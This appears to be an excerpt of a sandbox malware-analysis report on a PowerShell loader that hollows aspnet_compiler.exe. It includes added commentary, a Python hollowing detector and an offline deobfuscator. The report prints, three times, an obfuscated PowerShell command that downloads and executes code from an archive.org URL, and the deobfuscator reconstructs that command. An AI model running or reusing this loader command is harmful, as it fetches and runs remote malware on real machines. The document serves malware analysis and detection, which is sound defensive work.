      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Window / User API: foregroundWindowGot 544
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6984 Thread sleep time: -4611686018427385s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6928 Thread sleep time: -15679732462653109s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe File opened: C:\Users\user
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe File opened: C:\Users\user\AppData
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-NetEventVmNetworkAdapter
      Source: aspnet_compiler.exe, 00000016.00000002.1174819940.0000000005300000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-NetEventVmNetworkAdapter
      Source: aspnet_compiler.exe, 00000016.00000002.1174819940.0000000005300000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: aspnet_compiler.exe, 00000016.00000002.1174819940.0000000005300000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: powershell.exe, 00000003.00000003.971167113.000001EA3FF43000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln8A!
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-NetEventVmNetworkAdapter
      Source: aspnet_compiler.exe, 00000016.00000002.1174819940.0000000005300000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process token adjusted: Debug
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Memory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      Yara detected Powershell download and execute
      Source: Yara match File source: C:\Users\user\Documents\20210803\PowerShell_transcript.301389.iaYgJ3Zj.20210803203913.txt, type: DROPPED
      .NET source code references suspicious native API functions
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, #=qjryTBW16mUfo_ItH9KWoGQ==.cs Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
      Source: 22.2.aspnet_compiler.exe.400000.0.unpack, L.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
      Injects a PE file into a foreign processes
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
      Writes to foreign memory regions
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 420000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 422000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 772008
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 40A000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 40C000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: C76008
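The write sequence above is the footprint of PE process hollowing: an MZ header lands at 0x400000 (the default image base of a 32-bit .NET executable), further page-aligned writes follow just above it where the sections go, and one write goes to an address ending in 0x008. On a 32-bit process the PEB's ImageBaseAddress field sits at PEB+0x8, which RunPE-style loaders overwrite so the hollowed process starts from the injected image; reading 0x772008 and 0xC76008 as PEB+8 is an interpretation of the report's addresses, not something the report states. The Python below is an added example, not part of the report or the sample: it parses event lines constructed from the entries above (plus one constructed benign control) and applies that heuristic per writer/target pair.

```python
"""Heuristic detection of PE process hollowing from sandbox "Memory written" events.

Added example (not the report's own tooling). The event lines are constructed from the
report entries: powershell.exe writing into aspnet_compiler.exe, plus one benign control.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed from the report's "Memory written" entries (writer, target, base, first bytes).
EVENTS = [
    "powershell.exe Memory written: aspnet_compiler.exe base: 400000 value starts with: 4D5A",
    "powershell.exe Memory written: aspnet_compiler.exe base: 400000",
    "powershell.exe Memory written: aspnet_compiler.exe base: 402000",
    "powershell.exe Memory written: aspnet_compiler.exe base: 420000",
    "powershell.exe Memory written: aspnet_compiler.exe base: 422000",
    "powershell.exe Memory written: aspnet_compiler.exe base: 772008",
    # Constructed benign control: a foreign write that carries no PE header.
    "explorer.exe Memory written: notepad.exe base: 7FFE0000",
]

EVENT_RE = re.compile(
    r"^(?P<writer>\S+) Memory written: (?P<target>\S+) base: (?P<base>[0-9A-Fa-f]+)"
    r"(?: value starts with: (?P<head>[0-9A-Fa-f]+))?$"
)

PAGE = 0x1000
MZ_HEX = "4D5A"                 # "MZ", the DOS header magic at the start of every PE file
PEB_IMAGEBASE_OFFSET = 0x8      # PEB.ImageBaseAddress on 32-bit Windows (assumption: 32-bit target)
SECTION_WINDOW = 16 * 2**20     # section writes are expected within 16 MiB above the header


@dataclass
class Finding:
    writer: str
    target: str
    mz_base: int                                             # where a PE header was written
    section_writes: list[int] = field(default_factory=list)  # page-aligned writes above it
    peb_patches: list[int] = field(default_factory=list)     # writes at page offset 0x8

    @property
    def hollowing(self) -> bool:
        """A header alone could be a scanner; header plus sections or a PEB patch is a loader."""
        return bool(self.section_writes or self.peb_patches)


def parse_events(lines):
    """Yield (writer, target, base, head) for every line that matches the event format."""
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if m:
            yield m["writer"], m["target"], int(m["base"], 16), (m["head"] or "").upper()


def analyze(lines) -> list[Finding]:
    """Group writes by (writer, target) and report pairs where a PE header was written."""
    by_pair: dict[tuple[str, str], list[tuple[int, str]]] = {}
    for writer, target, base, head in parse_events(lines):
        by_pair.setdefault((writer, target), []).append((base, head))

    findings = []
    for (writer, target), writes in by_pair.items():
        mz_bases = sorted({b for b, h in writes if h.startswith(MZ_HEX) and b % PAGE == 0})
        if not mz_bases:
            continue  # no PE header written into this target
        finding = Finding(writer, target, mz_bases[0])
        for base, _ in writes:
            if base % PAGE == 0 and finding.mz_base < base < finding.mz_base + SECTION_WINDOW:
                if base not in finding.section_writes:
                    finding.section_writes.append(base)
            elif base % PAGE == PEB_IMAGEBASE_OFFSET:
                finding.peb_patches.append(base)
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f"{f.writer} -> {f.target}: PE header at {f.mz_base:#x}, "
              f"sections at {[hex(b) for b in f.section_writes]}, "
              f"PEB patches at {[hex(b) for b in f.peb_patches]}, hollowing={f.hollowing}")
```

The page-offset test for the PEB patch is deliberately loose (any write at offset 0x8 into a page); in a real pipeline the write size (4 bytes) and the target's actual PEB address from the sandbox would tighten it, and a 64-bit target would use PEB+0x10 instead.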
      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
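The powershell.exe command line above is a string-rebuilding obfuscation. $B, $CC and $A each start as a seed padded with "COIN" filler and are rewritten by a left-to-right chain of .Replace() calls; the backticks left in $A are then discarded by PowerShell's tokenizer, because a backtick in front of an ordinary character is a no-op escape. `-Join ''` on a single string returns it unchanged, so &('I'+'EX')($A -Join '') evaluates the rebuilt text as code, IEX(New-Object Net.WebClient).DownloadString($TRUMP), and whatever that download-and-execute returns is piped into a second IEX. The Python below is an added deobfuscator, not part of the report or the sample: it replays the replacements offline without executing anything. All literals are copied from the command line; treating `e as a plain "e" matches Windows PowerShell 5.1, the version the sample targets (PowerShell 6 and later map `e to the ESC character, which would break this token).

```python
"""Static deobfuscation of the wscript -> powershell command line in the report.

Added example, not part of the report or the sample. It replays the .Replace() chains
the way PowerShell evaluates them (left to right, ordinal, all occurrences) and drops
the backtick escapes PowerShell ignores in a command token, without running anything.
"""
import re

# Literals copied from the command line.
URL = "https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt"
B_SEED = "ETH COINt.WTF COINlIOSNT"
B_PAIRS = [("ETH COIN", "nE"), ("TF COIN", "EbC"), ("OS", "e")]
CC_SEED = "DOS COIN LSOSCOINnG"
CC_PAIRS = [("S COIN ", "Wn"), ("SO", "oaD"), ("COIN", "TrI")]
A_SEED = "I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)"
A_PAIRS = [("os COIN", "X(n`e"), ("BTC COIN", "-Ob"), ("TH COIN", "`c`T")]

# Backtick sequences that Windows PowerShell 5.1 turns into control characters. A tick
# before any other character is a no-op, which is what the obfuscation relies on.
# (Assumption: the sample targets 5.1; PowerShell 6+ additionally maps `e to ESC.)
PS51_ESCAPES = set("0abfnrtv")


def ps_replace_chain(seed: str, pairs) -> str:
    """Emulate seed.Replace(a, b).Replace(c, d)...: .NET String.Replace and str.replace
    both do ordinal, every-occurrence replacement, so the results agree."""
    out = seed
    for old, new in pairs:
        out = out.replace(old, new)
    return out


def strip_ticks(token: str) -> str:
    """Remove backtick escapes from a command token, refusing to guess when a tick
    precedes a character that really is an escape sequence."""
    def unescape(m: re.Match) -> str:
        ch = m.group(1)
        if ch in PS51_ESCAPES:
            raise ValueError(f"`{ch} is a real escape sequence, not a no-op")
        return ch
    return re.sub(r"`(.)", unescape, token)


def decode_sample() -> dict:
    """Rebuild the three variables and the expression the inner IEX finally parses."""
    b = ps_replace_chain(B_SEED, B_PAIRS)        # Net.WebClient (PowerShell is case-insensitive)
    cc = ps_replace_chain(CC_SEED, CC_PAIRS)     # DownloadString
    a_raw = ps_replace_chain(A_SEED, A_PAIRS)    # still carries the backticks
    a = strip_ticks(a_raw)                       # the token stream IEX actually sees
    # Substitute the variables the inner IEX resolves at run time, for reading only.
    resolved = a.replace("$B", b).replace("$CC", cc).replace("$TRUMP", f"'{URL}'")
    return {"B": b, "CC": cc, "A_raw": a_raw, "A": a, "resolved": resolved}


if __name__ == "__main__":
    for name, value in decode_sample().items():
        print(f"{name:>8}: {value}")
```

The same two helpers cover most Replace()-chain loaders of this family: change the seeds and pairs, keep the ordering, and let strip_ticks fail loudly rather than silently produce a wrong command when a sample does lean on a real escape sequence.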
      Source: aspnet_compiler.exe, 00000014.00000002.1175541598.0000000002D1A000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000016.00000002.1173256569.0000000001750000.00000002.00000001.sdmp Binary or memory string: Program Manager
      Source: aspnet_compiler.exe, 00000014.00000002.1173305362.0000000001220000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000016.00000002.1173256569.0000000001750000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
      Source: aspnet_compiler.exe, 00000014.00000002.1173305362.0000000001220000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000016.00000002.1173256569.0000000001750000.00000002.00000001.sdmp Binary or memory string: Progman
      Source: aspnet_compiler.exe, 00000014.00000002.1174501459.0000000002975000.00000004.00000001.sdmp Binary or memory string: Program Manager|$
      Source: aspnet_compiler.exe, 00000014.00000002.1173305362.0000000001220000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000016.00000002.1173256569.0000000001750000.00000002.00000001.sdmp Binary or memory string: Progmanlock
      Source: aspnet_compiler.exe, 00000014.00000002.1174501459.0000000002975000.00000004.00000001.sdmp Binary or memory string: Program Manager4
      Source: aspnet_compiler.exe, 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp Binary or memory string: Program ManagerD$#k
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
